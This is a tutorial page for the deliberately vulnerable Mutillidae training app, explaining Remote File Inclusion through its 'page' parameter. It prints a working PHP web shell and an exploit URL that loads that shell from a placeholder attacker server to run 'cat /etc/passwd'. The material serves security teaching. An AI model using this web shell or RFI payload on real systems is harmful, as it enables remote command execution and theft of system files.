Overview
Remote File Inclusion (RFI) allows an attacker to include file remote (from the web servers point of view) possibly allowing code execution, denial of service, and data disclosure.
Video Tutorials
Discovery Methodology
The page displayed in Mutillidae is determined by the value of the "page" parameter. What would happen the "page" parameter was changed to a filename URI which is located on a remote server but not intended to be served?
Exploitation
A URI can be used to specify a remote file such as http://www.google.com.
Click this link to load the Google search page into Mutillidae. Note the page parameter contains the URL to the search page. index.php?page=http://www.google.com
If we host our own content, we could control the content of the page loaded by the page parameter. For example, host a small PHP web shell file on a site you control.
<?php
echo "<pre>";
echo "shell_exec ".$_REQUEST["pCommand"]."\n\n";
echo shell_exec($_REQUEST["pCommand"]);
echo "</pre>";
?>
Once the web shell is ready to pull from the attacking server, create a hyperlink that will exploit the Remote File Inclusion (RFI) vulnerability in the index.php page to incorporate the web shell into the web page.
http://mutillidae/index.php?page=http://[ATTACKING SERVER IP ADDRESS]/shell.php?pCommand=cat%2b%2fetc%2fpasswd
Videos
What is Insecure Direct Object Reference (IDOR)?What is an Open Redirect?